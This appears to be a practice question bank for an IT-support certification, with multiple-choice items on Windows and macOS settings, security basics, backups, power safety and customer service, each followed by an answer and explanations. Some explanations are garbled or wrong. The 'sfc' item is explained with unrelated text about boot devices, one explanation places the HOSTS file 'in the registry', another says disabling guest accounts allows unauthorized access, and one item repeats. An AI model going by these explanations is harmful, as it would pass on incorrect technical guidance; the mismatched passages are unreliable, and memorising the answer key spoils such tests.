File transfer
Screen-sharing
Screen-sharing is software that is designed to work over HTTPS across the internet. This is secure because the connection is encrypted but also easier to implement as it does not require special firewall rules.
Some web-conferencing and videoconferencing software, like Microsoft Teams and Zoom, provides a screen-sharing client that participants may control.
With file transfer, users can choose a file-sharing protocol that can be used across all connected hosts. It allows configuring permissions on the share and provisioning user accounts that are recognized by both the server and client.
Desktop management suites are designed for deployment by a single organization and focus primarily on access control and authorization.
A client administrator sets up a new system for GUID partition table (GPT) partitioning. What dependency will the administrator need to set?
BIOS
MBR
TPM 2.0
UEFI
UEFI
When the disk uses GPT partitioning, the system firmware must be set to use the Unified Extensible Firmware Interface (UEFI) boot method.
The disk will not be recognized as a boot device if the boot method is set to BIOS.
While the scenario did not specify which OS the administrator was upgrading to, Windows 11 requires a CPU or motherboard supporting trusted platform module (TPM) version 2.
The master boot record (MBR) partition style stores a partition table in the first 512-byte sector on the disk, which is different from UEFI.
An endpoint machine administrator configures specific Apple computers designated for users with disability. Where should the administrator look to configure these settings?
Mission Control
Time Machine
Accessibility
Security & Privacy
Accessibility
The Accessibility preference pane is used to configure assistive vision and sound options, such as VoiceOver narration of screen elements, cursor size and motion settings, zoom tools, display contrast, font sizes, and captioning.
macOS has options to configure what analytics/telemetry data and personalized information can be collected. Users can adjust these options via the Security & Privacy preference pane.
The Time Machine preference pane lets data back up to an external drive or partition formatted using either the Apple File System (APFS) or macOS’s older extended file system.
The Mission Control feature is used for window management and enables users to set up multiple desktops.
A user is using AirDrop to send information to another device. What type of software is this?
Videoconferencing
File transfer
Screen-sharing
Desktop management
File transfer
File transfer allows users to select a file-sharing protocol that all the connecting hosts can use. Using this, both the server and client can configure permissions on the shared folders and provision user accounts.
Videoconferencing or web-conferencing software, such as Microsoft Teams or Zoom, includes a screen-share client, and some also participants to be granted control of the share.
Screen-sharing is software designed to work over HTTPS across the internet; this is secure because the connection is encrypted and easier to implement as it does not require special firewall rules.
Desktop management suites are designed for deployment by a single organization and focus primarily on access control and authorization.
A vulnerability manager is brainstorming different ways to enhance security for their cell phone devices. The company only uses Apple, and so one of the ideas the manager comes up with is to look for anomalistic files that do not belong with Apple for signs of possible malware which did not profile the device and instead just blasted malware out, hoping the operating system would be right. Which of the following would be anomalistic?
.pkg
.apk
.dmg
.app
.apk
An .apk file is a format for Android. The vulnerability manager only has Apple in their environment. Unknown sources enable untrusted apps to be downloaded from a website and installed using the .APK file format.
DMG (disk image) format is used for simple installs where the package contents need to be copied to the Applications folder.
PKG format is used where app setup needs to perform additional actions, such as running a service or writing files to multiple folders.
The app is placed in a directory with a .APP extension in the Applications folder when it has been installed.
A user experiences issues searching their local computer for files. What is a common issue that the user should check?
User accounts
Hide extensions
Show hidden files
Indexing options
Indexing options
Search is also governed by settings configured in the Indexing Options applet. A corrupted index is a common cause of search problems.
A user account controls access to the computer. Each account can be assigned rights or privileges to make OS configuration changes. Accounts can also be assigned permissions on files, folders, and printers.
A file or folder can be marked as “Hidden” through its file attributes. Files marked as hidden are not shown by default but can be revealed by setting the “Show hidden files, folders, and drives” option.
Hide protected operating system files configures files marked with the System attribute as hidden.
A helpdesk professional assists a user with issues booting up their Mac computer. The user reports that there is no drive to boot from. Where will the computer boot from?
Force Quit
Terminal
Web
FileVault
Web
When users reboot an Apple Mac, if the startup drive is not available for any reason and it is connected to the internet, the computer will try to boot from a web-based drive.
The Terminal can be used to access the command-line environment, which uses either the Z shell (zsh) or Bash. Older macOS versions use Bash, while zsh is the default from Catalina up.
If a macOS app stops responding, it should be possible to close it down and restart without restarting the computer, using Run Force Quit from the Apple menu or press COMMAND+OPTION+ESC.
FileVault is a disk encryption product. Encryption protects the data stored on a disk against the possibility that a threat actor could remove it.
A transportation company wants to set up software that gathers statistics from the controller area network for trailers hauling loads, enabling them to adjust processes to optimize cost savings. What type of adapter will the company need to send the statistics back to their cloud network?
Wired
Wireless
WWAN
VPN
WWAN
Wireless Wide Area Network (WWAN) uses a cellular adapter to connect to the internet via a provider’s network. These networks are typically metered with a set data limit.
A virtual private network (VPN) connects the components and resources of two (private) networks over another (public) network.
Almost all wired network connections are based on some Ethernet. The adapter’s media type must match the switch it is connected to.
While WWAN could be considered wireless, wireless generally refers to a computer that connects to the 2.4 or 5 GHz spectrum with a limited physical range.
While researching and writing a paper on their home computer, a student notices an alert in the notification area that Windows Defender has expired and needs to be updated. The student is annoyed by the interruption but clicks on the alert and follows the update instructions. Later, the student told their parents that Defender expired, and they installed the update. The student’s parents are panic-stricken. Determine the best reason for the parents’ reaction from the information provided.
The parents know the Windows Defender subscription was recently renewed.
The parents have scheduled all updates to occur during the automatic maintenance window at 2:00am.
A malicious browser push notification tricked the student into a drive-by download.
A malicious browser push notification tricked the student into downloading malware.
A malicious browser push notification tricked the student into downloading malware.
One way to infect a host with malware is to misuse the browser push notification system that allows a website to send messages. Often these messages are designed to trick users into installing malware by disguising it as an antivirus update.
While this scenario describes a malicious browser push notification, it is not a drive-by download. In a drive-by attack, the computer is infected with malware simply by visiting a malicious site; there is no user installation.
Defender is a Windows built-in antivirus and firewall product, so it does not expire. Scheduled updates are irrelevant.
Defender has no subscription to be renewed because it is automatically installed on all Windows computers (starting with Windows 7).
Which of the following contains information about ingredients, health hazards, precautions, and first aid information and what to do if the material is spilled or leaks?
MSDS
Surge suppressor device
Proper power handling
Electrical fire safety
MSDS
A material safety data sheet (MSDS) includes information about recycling any waste product or disposing of it safely by government regulations.
Electrical fire safety ensures that equipment is properly stored and away from any flammable material and electrical wires do not start a fire.
Surge suppressor devices come in the form of adapters, trailing sockets, or filter plugs, with the protection circuitry built into the unit. These devices offer low-cost protection to one or two pieces of equipment.
Proper power handling is done with the correct training. PC power supply units can carry dangerously high levels of voltage. Disconnection of power should be done before repairing a PC.
A user receives an unsolicited call from a Microsoft support technician during a normal workday. The technician says the antivirus software on the user’s computer alerted Microsoft of a new malware infection. The technician needs to remote into the user’s computer to fix the problem. What is the technician trying to do?
Address the problem faster with a call rather than a pop-up notification alert.
Proactively respond to a virus alert.
Circumvent security software.
Address the problem faster with a call rather than an email.
Circumvent security software.
Microsoft does not directly support users and would never randomly contact a user. This scenario is a scam to try to steal a user’s credentials.
Microsoft would not receive a malware alert because the company does not directly support users. Also, Microsoft would not contact a user.
Microsoft does not directly support users and does not receive malware alerts about any user. Moreover, the company does not call users or email users.
Microsoft does not call users and would not receive an antivirus alert that would cause the company to generate a notification.
When making major adjustments to a project, a security technician will have to assess the business and technical merits as well as the risks of the adjustment plan. What documentation will need to be submitted?
Sandbox testing
Risk levels
Change board approval
Rollback plan
Change board approval
Change board approvals are when a serious change request is made, and approvals go to a change advisory board (CAB). The CAB should include stakeholders for departments, users, or customers whom the change will impact and those proposing it, technicians responsible for implementing it, and managers/directors who can authorize the budget.
Sandbox testing is a computing environment designed to replicate the production environment but isolated from it.
A rollback plan is when a change can be reversed if it has harmful or unforeseen consequences.
Risk levels are included in the risk assignment that could be expressed as a discrete value or as a traffic light-type of indicator, where red is high, orange is moderate risk, and green is minimal risk.
A security administrator moves their proxy from on-premise to the cloud and wants to establish a client tunnel to the cloud proxy tunnel for web traffic. This way, the users are protected even while out in public and not connected to the domain. What should the administrator set up?
Mapped drive
DNS settings
WWAN
VPN
VPN
A virtual private network (VPN) connects the components and resources of two (private) networks over another (public) network.
Wireless Wide Area Network (WWAN) uses a cellular adapter to connect to the internet via a provider’s network. These networks are typically metered with a set data limit.
A mapped drive is a share that has been assigned to a drive letter on a client device. To map a share as a drive, right-click it and select Map Network Drive.
While it is best practice to configure DNS settings to resolve the VPN concentrator, technically, it could be done with an IP.
Which of the following devices come in the form of adapters, trailing sockets, or filter plugs, with the protection circuitry built into the unit?
Compressed air blaster
Anti-ESD strap
Surge suppressor
Antistatic bags
Surge suppressor
Surge suppressors are passive protection devices that can filter out the effects of surges and spikes.
A compressed air blaster can be used to dislodge dust from difficult-to-reach areas. When performing this sort of maintenance within a controlled area, wear an appropriate air-filter mask and goggles.
Antistatic bags are packages that reduce the risk of ESD because it is coated with a conductive material.
Anti-ESD wrist straps should fit snugly around the wrist or ankle so that the metal stud makes contact with the skin. Wearing an anti-ESD wrist strap causes the static charge to dissipate more effectively.
previous
A company has experienced a power outage, but activation of an alternative source has kicked in. What is this alternative source called?
Fuse
Surge suppressor
Voltage
UPS
UPS
An uninterruptible power supply (UPS) will provide a temporary power source in the event of complete power loss. An alternate power source can be a backup battery to a generator.
Surge suppressors are passive protection devices that can filter out the effects of surges and spikes. These devices offer low-cost protection to one or two pieces of equipment.
An electrical device has a fuse appropriate to its maximum current. If the current increases past the fuse capacity, the fuse will blow. However, if the fuse fitted is rated too low, the fuse will blow too easily.
Voltage is the potential difference between two points measured in volts (V).
A technician detected and reported an incident, resulting in the appropriate unit being notified and tasked with acting as first responders, taking charge of the situation, and formulating the appropriate response. What is this unit called?
CSIRT
Chain of custody
Open-source
IRP
CSIRT
The computer security incident response team (CSIRT) is used in some larger organizations to provide a range of decision-making and technical skills required to deal with different types of incidents.
An open-source license makes it free to use, modify, and share and makes the program code used to design it available.
An incident response plan (IRP) sets the procedures and guidelines that an IT team must adopt to deal with security incidents.
A chain of custody form records who collected the evidence, who has handled it subsequently, where they stored it, and must show access to the evidence at every point.
An installer is implemented using. EXE file. What is this technique performing?
Gathering of information
Initiating updates
Introducing malware
Installation of applications
Installation of applications
Installation of applications is used in Windows as a setup file that can be executed in silent mode using the command switches for its installer. In Linux, scripts are often used to compile apps from source code.
In Windows Power, hundreds of Get verb cmdlets gather information/data from a Windows subsystem. Bash supports numerous commands to manipulate text.
The initiation of updates takes place through wusa.exe in Windows, which
processes batch files to initiate a typical update. The PSWindowsUpdate module in PowerShell contains numerous cmdlets. Users can use apt.get/apt or yum from a Bash script in Linux.
A technician helps a customer with a ticket request and needs to record that the customer has accepted that the ticket can be closed. Which of the following fields reflect this part of the ticket life cycle?
Progress notes
Escalation levels
Problem description
Problem resolution
Problem resolution
Problem resolution sets out the plan of action and documents the successful implementation and testing of the plan and full system functionality.
Problem description records the initial request with any detail that could easily be collected at the time.
Progress notes record what diagnostic tools and processes have been discovered and identify and confirm a probable cause.
Escalation levels occur when an agent cannot resolve the ticket. The support team can be organized into tiers to clarify the escalation levels. The ticket owner is the person responsible for managing the ticket.
An employee enters the web address of their local newspaper to check for news on the company, and a site pops up with many click-bait celebrity stories. The employee re-enters the address assuming a misspelling but returns to the same page. When the help desk technician arrives, which of the following troubleshooting steps would be appropriate?
Check to see if the DNS browser is configured correctly.
Check HOSTS files for malicious entries.
Check the System Configuration Utility.
Check to see if the newspaper website’s certificate is expired.
Check HOSTS files for malicious entries
This scenario describes a redirection when a user tries to open one page but is sent to another. Here, it appears adware is driving traffic to another site to increase clicks. Since HOSTS maps domain names to IP addresses, the HOSTS file in the registry would show malicious entries to re-route IP addresses.
The Domain Name Server (DNS) is a server, not a browser. However, the nslookup command can be used to check DNS records.
Any problem with a website’s certificate will likely generate a message. It will not send a user to another website.
The System Configuration Utility modifies various settings and files that affect how the computer boots and loads Windows.
An administrator uses an access control system to shuttle authentication and authorization traffic between the supplicant and the AAA that encrypts an entire authentication rather than just the password. What is this method?
Kerberos
AES
TACACS+
RADIUS
TACACS+
Terminal access control system plus (TACACS+) is one way of implementing authentication, authorization, and accounting (AAA). TACACS+ is often used in authenticating administrative access to routers, switches, and access points.
Remote authentication dial-up user service (RADIUS) is implementing the AAA server when configuring enterprise authentication. Rather than storing and validating user credentials directly, it forwards data between the RADIUS server and the supplicant without reading it.
Kerberos allows a user account to authenticate to a domain controller (DC) over a trusted local cabled segment. Kerberos facilitates single sign-on (SSO).
Advanced encryption standard (AES) is the standard encryption used by WPA2 and the strongest encryption standard to use by Wi-Fi.
What method gets a system back up and running before the recommended amount of time elapses?
Sandbox testing
Change board approval
Rollback plan
Risk levels
Rollback plan
A rollback plan is when a change can be reversed if it has harmful or unforeseen consequences.
Change board approvals are when a serious change request is made, and approvals go to a change advisory board (CAB). The CAB should include stakeholders for departments, users, or customers whom the change will impact and those proposing it, technicians responsible for implementing it, and managers/directors who can authorize the budget.
Sandbox testing is a computing environment designed to replicate the production environment but isolated from it.
Risk levels are included in the risk assignment that could be expressed as a discrete value or as a traffic light-type of indicator, where red is high, orange is moderate risk, and green is minimal risk.
A 3D animations expert is searching for a new computer. What should they ensure it has to handle their demanding software?
Integrated graphics card
Dedicated graphics card
64-bit CPU
Hardware token
Dedicated graphics card
A demanding application, such as graphic design software or a game, will likely require a dedicated graphics card with video RAM, separate from the general system RAM.
An integrated graphics card would not be enough to handle a demanding application such as graphic design software.
While a 64-bit CPU would probably help in this instance, a dedicated graphics card would provide the resource chokepoint for the 3D application.
An external hardware token is a smart card or USB form factor device that stores cryptographic user identification data. The user must present the token and supply a password, PIN, or fingerprint scan to authenticate.
Which of the following can prevent, detect, and remove software threats that consist of ransomware, Trojans, spyware, and rootkits?
OS reinstallation
Security-awareness training
Recovery mode
Anti-malware
Anti-malware
Anti-malware is computer software used to avoid, identify, and eliminate malware. Anti-malware is like antivirus software but for more up-to-date malware.
Recovery mode is the step-by-step processing of manual removal to disable persistence mechanisms and reconfigure the system to its secure baseline.
OS reinstallation is when the antivirus software cannot recover data from infected files, and a user must complete a system restore.
Security-awareness training is usually delivered to employees at all levels, including end-users, technical staff, and executives. The training includes anti-phishing, software firewalls, passwords, malware threats, and more.
A technician uses a backup method that reflects how much lost work can be tolerated. What is this method?
Frequency
Full with incremental
Full with differential
Retention
Frequency
Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.
Retention is the period that any given backup job is kept for. Short-term retention is important for version control and for recovering from malware infection.
Full with incremental means that the chain starts with a full backup and then runs incremental jobs that select only new files and files modified since the previous job.
Full with differential means that the chain starts with a full backup and then runs differential jobs that select new files and files modified since the original full job.
A technician runs an isolated test that allows them to run the program without impacting the system. What is this called?
Sandbox
Rollback plan
End-user acceptance
Affected systems
Sandbox
Sandbox testing is a computing environment designed to replicate the production environment but isolated from it.
End-user acceptance must be accounted for when a change of plan is implemented. It can be difficult for people to adapt to new processes and easy for them to magnify minor problems into major complaints.
A rollback plan is when a change can be reversed if it has harmful or unforeseen consequences.
Affected systems must be considered in the implementation of change. Companies should first attempt to test the change for the most significant or major changes.
A technician needs to set up a method that blocks URLs or search terms using keywords and phrases. What is this method?
Encryption setting
Disable guest access
Changing channels
Content filtering
Content filtering
Content filtering means that the firewall downloads curated reputation databases that associate IP address ranges, Fully Qualified Domain Names (FQDNs), and URL web addresses with sites known to host various categories of content.
Changing channels can be accessed by using a Wi-Fi analyzer to identify which channel within the access point’s range is least congested.
Disable guest access when a user does not want a guest network. The guest network is usually isolated from the other local devices.
Guests can connect to this network and access the internet without a password. Encryption settings allow users to set the authentication mode.
Users are curious about what is run on startup, so they dig into the startup script. The users find the command “net use M: \sharedrive\data /persistent:yes”. What is the startup script invoking?
Print share
Mapped drive
Proxy
File server
Mapped drive
A mapped drive is a share that has been assigned to a drive letter on a client device. To map a share as a drive, right-click it and select Map Network Drive.
A user may be mapping a file server, but mapped drives do not always exist on file servers. They could be on network-attached storage or shared directly from another client machine.
The user is not mapping a print share with this command, but printers can be shared through various means, such as a print server.
This command does not configure the proxy. The settings for proxy information can be found in internet options.
A user performs a technique that allows them to connect their PlayStation to their network. What is this technique?
Screened subnet
UPnP
Static IP
Encryption setting
UPnP
The universal plug-and-play (UPnP) framework sends instructions to the firewall with the correct configuration parameters to allow applications to work.
A screened subnet establishes a more secure configuration. The idea of a screened subnet is that some hosts are placed in a separate network segment with a different IP subnet address range than the rest of the local area network (LAN).
Static IP can be auto configured as a DHCP reservation, but if manual configuration is required, follow the service provider’s instructions to configure the correct address on the router’s Wide Area Network (WAN) interface.
Encryption settings allow users to set the authentication mode.
What type of data breach can be associated with a specific person or use an anonymized or de-identified data set for analysis and research?
Personal government-issued information
Healthcare data
Open-source license
PII
Healthcare data
Healthcare data refers to medical and insurance records plus associated hospital and laboratory test results.
Personal government-issued information is issued to individuals by federal or state governments. Personal information may be social security numbers, passports, driving licenses, and birth/marriage certificates.
Personally identifiable information (PII) is data that can be used to identify, contact, locate an individual or, in the case of identity theft, impersonate that individual.
The open-source license makes it free to use, modify, and share and makes the program code used to design it available.
Rooting is typically an action related to Android, while jailbreaking is associated with iOS. They are both trying to do the same thing. What is that?
Publish malicious apps.
Spoofing
Bootlegging
Gain unrestricted access.
Gain unrestricted access.
The goal of rooting and jailbreaking is to gain unrestricted access, or privilege escalation, by subverting the security controls built into iOs or Android. This also has the side effect of leaving many security measures permanently disabled.
Publishing malicious apps is the purview of rogue developers. It is not the goal of rooting and jailbreaking.
Bootlegging is developing software that illegally copies or imitates a commercial product or brand.
Spoofing is developing a malicious app that spoofs a legitimate app by using a similar name and fake reviews, and automated downloads to boost its apparent popularity.
Worried about a crash, a user creates a complete backup of the system configuration and data files on their computer. Identify what the user has created.
An update rollback
A reimage
An image
A update
An image
A backup of everything on the computer, including the installation, settings, apps, and files, is also called an image.
Reimaging is not a backup. It removes system files and resets all PC settings to default, usually done when the hard disk or operating system is damaged or malware-infected.
An update fixes or improves the computer’s operating system, drivers, or software. Nothing else is changed, and nothing on the computer is backed up.
If an update to Windows or an application/program causes problems with the computer, it can be rolled back (uninstalled).
A remote computer administrator is managing clients in rigorous conditions. The clients keep overheating and often have issues. The administrator wants to run regular checks for damage or corruption. Which of the following will help them accomplish this?
shutdown
gpresult
winver
sfc
sfc
Historically, most attended installations and upgrades were run by booting from optical media (CD-ROM or DVD). The optical drive must be set as the priority boot device.
Another problem with disc-based installs is that the setup disc quickly becomes out-of-date. USBs became more popular later on for the ability to load the latest install.
A computer that supports network boot could also be configured to boot to set up over the internet.
Once the OS has been installed, the user will usually want to set the internal hard drive as the default (highest priority) boot device and disable any other boot devices.
A new employee calls the help desk because their phone will not connect to the office Wi-Fi. When the technician asks about the phone model, the employee says it is an iPhone 5. The technician immediately knows the problem. Which of the following could be the problem?
Configuration
Signal strength
Interference
Throttling
Configuration
Since the technician knew the problem based on the phone model, the most likely cause would involve configuration issues between the device and the wireless access point related to the 802.11 standard or the GHz band.
Signal strength can be affected by distance but not likely by the phone model.
The phone model would not impact interference from other devices or thick walls or metal.
Concerning smartphones, throttling refers to a purposeful reduction in phone performance by a manufacturer’s update to the device that instructs it not to perform at its maximum capabilities.
Users perform a technique that tends to select C, M, N, O, and S shapes. Which of the following is this?
Facial recognition
Swipe
PIN
Pattern
Pattern
Pattern requires the user to swipe a “join-the-dots” pattern. The pattern method has numerous weaknesses.
Swipe is a gesture that means that access to the device is unauthenticated. Simply swiping across the screen will unlock the device.
Facial recognition is a method that creates a template computer from a 3-D image of the user’s face. A facial bio gesture has the advantage of using the camera rather than a special sensor.
Personal identification numbers (PINs) are used on most devices to enable screen lock authentication and generate an encryption key. The PIN can act as a primary or backup authentication method.
A user has just set up their network and needs to make sure that their network is secure, and no one can log in to the network. Which of the following should the user do?
Perform firmware updates.
Change default passwords.
Consider the physical placement.
Locate the SSID.
Change default passwords.
Change the default password to secure the administrator account. Choose a new strong password of 12 characters or more.
Physical placement of any router or network appliance should be made to a secure location. A non-malicious threat actor could damage or power off an appliance by accident.
Firmware updates are important because it allows the user to fix security holes and support the latest security standards.
Service set ID (SSID) is a simple, case-sensitive name that users identify the WLAN. The factory configuration uses a default SSID that is typically based on the device brand or model, which should be changed so users will recognize the network.
A user wants to connect to multiple systems after a single login at only one of the devices. What is this called?
Fingerprint
PIN
SSO
UAC
SSO
Single sign-on (SSO) means that a user authenticates once to a device or network to access multiple applications or services.
User account control (UAC) is a Windows security feature designed to protect the system against malicious scripts and attacks that could exploit the powerful privileges assigned to members of the Administrators group.
A personal identification number (PIN) can contain letters and symbols. It is a passcode used to process authentication of a user accessing a system.
A fingerprint is the type of bio gesture authentication that uses a sensor to scan the unique features of the user’s fingerprint.
A user is on a website using an HTTPS URL; the browser displays the information about the certificate in the address bar. What does this certificate validate?
Pop-up blocker
Browser sign-in
Secure connection
Untrusted source
Secure connection
A secure connection validates the host’s identity running a site and encrypts communications to protect against snooping.
An untrusted source is when an installer cannot be verified through a digital signature or has been a security risk and is likely to expose the user to unwanted adverts. Some untrusted sources do not block ads or have pop-up blockers.
Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.
Pop-up blockers prevent a website from creating dialogs or additional windows. The pop-up technique was used to show fake advertisements and security warnings.
What component storage prevents static electricity from discharging?
Antistatic bags
ESD mats
Dissipative packaging
ESD straps
Antistatic bags
Antistatic bags are packages that reduce the risk of ESD because it is coated with a conductive material.
Anti-electrostatic discharge (ESD) straps are worn to dissipate static charges effectively. The band should fit snugly around the wrist or ankle so that the metal stud contacts the skin.
Electrostatic discharge (ESD) mats are used to organize sensitive components. The mats contain a snap connected to the wrist or leg strap.
Dissipative packaging is light pink or blue packaging that reduces the buildup of static in the general vicinity of the contents by being slightly more conductive than normal.
A user wants to maximize resource dedication to 3D performance and frame rate. Where should the user go to do this?
Apps
Devices
System
Gaming
Gaming
Game mode suspends Windows Update and dedicates resources to supporting the active game app’s 3D performance and frame rate rather than other software or background services.
The System Settings page in the Settings app presents options for configuring input and output devices, power, remote desktop, notifications, and clipboard (data copying).
The Devices settings pages contain options for input devices (mice, keyboards, and touch), print/scan devices, and adding and managing other peripherals attached over Bluetooth or USB.
In the Settings app, the Apps group is used to view and remove installed apps and Windows Features.
A curious IT administrator notices issues with certain applications invoking the kernel. Which operating system would allow the administrator to change the underlying operating system?
iOS
Android
macOS
iPadOS
Android
Android is a smartphone/tablet OS developed by the Open Handset Alliance, primarily driven by Google. Unlike iOS, it is an open-source OS based on Linux.
iOS is the operating system for Apple’s iPhone smartphone and original models of the iPad tablet. Like macOS, iOS is also derived from UNIX and developed as a closed-source operating system.
The iPadOS has been developed from iOS to support the functionality of the latest iPad models (2019 and up).
The macOS is a closed-source operating system that does not allow users to make changes.
A server administrator was called in to help a VIP whose computer was accidentally infected with a virus. The administrator wants to revert the computer but still preserve user personalization settings. What should the administrator use?
Third-party drivers
Refresh
Factory partition
Reset
Refresh
Windows supports refresh and reset options to try to repair the installation. Using refresh recopies the system files and reverts most system settings to the default but can preserve user personalization settings, data files, and more.
Using the full reset option deletes the existing OS plus apps, settings, and data ready for the OS to be reinstalled.
A factory recovery partition is a tool used by the original equipment manufacturers (OEMs) to restore the OS environment to its ship state. The recovery partition is created on the internal fixed drive.
The OS setup media might not contain drivers for certain hardware devices, but this could be part of an unattended file.
Which of the following should generate an alert when the account is disabled or altered?
Restrict login times.
Change default administrator account.
Restrict user permission.
Disable guest account.
Change default administrator account.
These default accounts have practical limitations and consequently are the ultimate target for threat actors. Any use of the default administrator account must be logged and accounted for.
Disabling guest accounts allow unauthorized access to the computer and may provide some sort of network access too. It is only enabled to facilitate password-less file sharing in a Windows workgroup.
Restrict user permission means some networks have complex requirements for assigning rights. However, the basic principle is that the number of accounts with administrator privileges should be as few as possible.
Restrict login times are typically used to prevent an account from logging in at an unusual time of the day or night or during the weekend.
A marketing professional normally sends large files to other team members. The IT department recommended using a shared drive and assisted them in setting it up. The project was a very high priority, so the professional collaborated with several members but started receiving reports that some users could not access it sometimes and others could. They eventually figured out that only 20 people at a time seemed to be able to access it. What is causing the issue?
DNS settings are intermittent.
The share was created on a Windows desktop.
The proxy settings are not properly configured on client machines.
The file server was not properly configured.
The share was created on a Windows desktop.
The Share tab in the folder’s Properties dialog can customize permissions, change the share name, and limit the number of simultaneous connections. Windows desktop versions are limited to 20 inbound connections.
If more than 20 users access the share, the data should be stored on file servers rather than local client computers.
The proxy settings will not affect users’ ability to access the file share in this scenario. It could cause issues accessing the internet, however.
If the domain name system (DNS) were causing an issue, the users would not be limited to 20 people. It is possible that load-balanced DNS servers could cause issues if one is incorrect.
A security analyst conducts an incident response investigation against suspected malware on a userbox. The analyst suspects a certain variant of malware known to beacon out to a command and control server. What command will help them investigate this?
hostname
net use
net user
netstat
netstat
The netstat command can investigate open ports and connections on the localhost, which will help to investigate potential command and control connections established by malware on the localhost.
The hostname command returns the name configured on the local machine. The DNS server can also contain records to point machines to the host.
Several net and net use command utilities can be used to view and configure shared resources on a Windows network.
Accounts can be managed at the command line using net users, which must be executed in an administrative command prompt.
A vulnerability and risk manager reviews older systems that can only receive critical patches. What are these systems classified as?
Extended support
Beta
End of life
Supported
Extended support
During the extended support phase, the product is no longer commercially available, but the vendor issues critical patches.
An end-of-life (EOL) system is one that its developer or vendor no longer supports. EOL systems no longer receive security updates and therefore represent a critical vulnerability.
A public beta phase might be used to gather user feedback. Microsoft operates a Windows Insider Program where users can sign up to use early release Windows versions and feature updates.
When the product is being actively marketed during the supported phase, the vendor releases regular patches to fix critical security and operational issues and feature upgrades to expand OS functionality.
Which of the following will block untrusted application sources from running?
Firewall
Failed login attempts
Anti-malware
OS updates
Anti-malware
Anti-malware applications designed for mobile devices tend to work more like content filters to block access to known phishing sites and block adware/spyware activity by apps.
Failed login attempts mean that the device locks for a set period if an incorrect passcode or bio gesture is used; this deters attempts to guess the passcode or use a spoofed biometric.
OS updates are as critical as it is for a desktop computer. The install base of the iOS is generally better at applying updates because of the consistent hardware and software platform.
Firewall applications for mobile devices can monitor app activity and prevent connections to ports or IP addresses.
A Windows client administrator plans to upgrade their OS in the current environment. What is one of the most important considerations for the upgrade?
Journaling
User training
TPM 2.0
Dynamic Disks
User training
Different desktop styles introduced by a new OS version or changing from one OS to another can generate issues as users struggle to navigate the new desktop and file system. An upgrade project must take account of this and prepare training programs.
While the scenario did not specify which OS the administrator was upgrading to, Windows 11 requires a CPU or motherboard supporting trusted platform module (TPM) version 2.
When data is written to an NTFS volume, it is re-read, verified, and logged via journaling. In the event of a problem, the sector concerned is marked as bad and the data relocated.
The Dynamic Disks feature allows multiple physical disks to be combined into volumes.
A software engineer uses the “data protection” option for the apps on their mobile device. This option is subject to the second round of encoding using a key derived from and protected by the user’s credentials. What is this method?
Device encryption
Profile security requirements
Remote backup application
Locator application
Device encryption
Device encryption is enabled automatically when a user configures a passcode lock on the device.
A remote backup application is the backup of data, apps, and settings to the cloud. A user may choose to use a different backup provider or a third-party provider like Dropbox.
Profile security requirements document the details of the secure implementation of a device. These policies are applied to different employees and different sites or areas within the site.
A locator application finds a device if it is lost or stolen. Once set up, the phone’s location can be tracked from any web browser when it is powered on.
If an individual is creating an account and unable to think of a strong key code word, the browser can suggest strong keycodes to use. What is this called?
Ad-blocker
Browser sign-in
Password manager
Secure connection
Password manager
Password managers suggest a strong password at each new account sign-up or credential reset and autofill this value when the user needs to authenticate to the site.
Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.
Secure connection validates the host’s identity running a site and encrypts communications to protect against snooping.
Ad blockers use more sophisticated techniques to prevent displaying anything that does not seem to be part of the site’s main content or functionality. Many sites detect ad blockers and do not display any content while enabling filtering.
A security analyst notices an unauthorized disclosure of customers’ data at the company. What type of data is breached?
PII
Open-source license
Healthcare data
Chain of custody
PII
Personally identifiable information (PII) is data that can be used to identify, contact, or locate an individual or impersonate that individual in the case of identity theft. PII is any representation of information that authorizes the identity of an individual.
The open-source license makes it free to use, modify, and share and makes the program code used to design it available.
Healthcare data refers to medical and insurance records plus associated hospital and laboratory test results.
The chain of custody form records where, when, and who collected the evidence, handled it subsequently, and stored it.
A helpdesk manager assesses older Windows 7 computers their company owns and tries to determine available upgrade paths. Which of the following can NOT be upgraded?
Windows 7 Pro to Windows 10 Home
Windows Home to Windows 10 Pro
Windows 7 Home Premium to Windows 10 Pro
Windows 7 Home to Windows 10 Enterprise
Windows 7 Home to Windows 10 Enterprise
Users cannot upgrade from a Home to an Enterprise edition. If users consider an in-place upgrade, they must check that the current OS version is supported as an upgrade path to the intended version.
Users can upgrade from Windows 7 Home Premium to Windows 10 Home or Pro. With Windows, users have to consider the edition when upgrading.
Users can upgrade from Windows 10 Home to Windows 10 Pro.
Downgrading the edition is supported in some circumstances (Windows 7 Professional to Windows 10 Home, for instance), but this only retains documents and other data, not apps and settings.
While researching and writing a paper on their home computer, a student notices an alert in the notification area that Windows Defender has expired and needs to be updated. The student is annoyed by the interruption but clicks on the alert and follows the update instructions. Later, the student told their parents that Defender expired, and they installed the update. The student’s parents are panic-stricken. Determine the best reason for the parents’ reaction from the information provided.
A malicious browser push notification tricked the student into a drive-by download.
A malicious browser push notification tricked the student into downloading malware.
The parents know the Windows Defender subscription was recently renewed.
The parents have scheduled all updates to occur during the automatic maintenance window at 2:00am.
A malicious browser push notification tricked the student into downloading malware.
One way to infect a host with malware is to misuse the browser push notification system that allows a website to send messages. Often these messages are designed to trick users into installing malware by disguising it as an antivirus update.
While this scenario describes a malicious browser push notification, it is not a drive-by download. In a drive-by attack, the computer is infected with malware simply by visiting a malicious site; there is no user installation.
Defender is a Windows built-in antivirus and firewall product, so it does not expire. Scheduled updates are irrelevant.
Defender has no subscription to be renewed because it is automatically installed on all Windows computers (starting with Windows 7).
A technician is talking to a customer about an issue, but the customer is not sure how to locate the issue on their computer, so the technician has the customer tell them step by step to figure out the issue. What type of technique is this?
Be judgemental.
Ask a closed question.
Hang up.
Ask an open-ended question.
Ask an open-ended question.
An open-ended question that invites the other person to compose a response.
Closed questions can only be answered with a “yes” or “no” or require some other fixed response.
Hang up and be guided by whatever policy an organization has in place, but in general, if a customer is abusive or threatening, issue a caution to warn them about this behavior.
Being judgmental is not one that will help in this situation. Do not assume that the customer lacks knowledge about the system. Not understanding their point of view may frustrate them more.
Which of the following is to use clear and concise statements that avoid jargon, abbreviations, acronyms that a user might not understand?
Cultural sensitivity
Business attire
Formal attire
Proper language
Proper language
Proper language is not being overly familiar with customers. Do not use slang phrases and any language that may cause offense. When active listening, the employee makes a conscious effort to focus on what the other person is saying.
